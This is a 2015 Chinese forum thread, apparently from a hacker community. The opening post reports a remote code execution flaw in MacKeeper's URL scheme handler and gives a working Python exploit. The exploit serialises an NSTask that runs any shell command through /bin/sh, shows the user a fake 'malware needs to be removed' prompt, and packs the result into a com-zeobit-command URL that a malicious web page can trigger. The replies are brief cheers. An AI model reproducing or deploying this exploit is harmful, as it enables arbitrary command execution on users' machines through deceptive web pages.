90_ 发表于 2015-5-10 17:03:07

MacKeeper任意代码执行EXP

相信Mac用户一定看过Mackeeper的广告——这是一款Mac OS系统优化软件,集杀毒、加密、数据备份、系统清理和软件卸载于一身,可以认为是Mac下的360。
5月7日,Mackeeper被发现存在严重的安全漏洞,在其处理URL的代码中存在远程代码执行漏洞,当用户访问被恶意构造的网页即可触发高危漏洞。

EXP:
import sys,base64
from Foundation import *
RUN_CMD = "rm -rf /Applications/MacKeeper.app;pkill -9 -a MacKeeper"
d = NSMutableData.data()
a = NSArchiver.alloc().initForWritingWithMutableData_(d)
a.encodeValueOfObjCType_at_("@",NSString.stringWithString_("NSTask"))
a.encodeValueOfObjCType_at_("@",NSDictionary.dictionaryWithObjectsAndKeys_(NSString.stringWithString_("/bin/sh"),"LAUNCH_PATH",NSArray.arrayWithObjects_(NSString.stringWithString_("-c"),NSString.stringWithString_(RUN_CMD),None),"ARGUMENTS",NSString.stringWithString_("Your computer has malware that needs to be removed."),"PROMPT",None))
print "com-zeobit-command:///i/ZBAppController/performActionWithHelperTask:arguments:/"+base64.b64encode(d)

heiwu98 发表于 2015-5-12 01:22:47

这么厉害。http://www.pasteimg.info/files/img/user_uploads/b18qdy8dd349988869.gif

中国之利刃 发表于 2015-6-14 09:38:13

你们城里人。。真会玩。。

H.U.C-麦麦 发表于 2015-6-27 06:26:09

加油!干倒冰儿和酒仙!

yusiii 发表于 2015-6-27 07:25:25

还是不错的哦,顶了

cl476874045 发表于 2015-6-27 09:27:09

学习学习技术,加油!

Micah 发表于 2015-6-27 09:51:55

支持中国红客联盟(ihonker.org)

H.U.C-麦麦 发表于 2015-6-27 10:14:31

加油!干倒冰儿和酒仙!

Lucifer 发表于 2015-6-28 10:28:30

还是不错的哦,顶了

wilist 发表于 2015-6-28 21:17:49

页: [1]
查看完整版本: MacKeeper任意代码执行EXP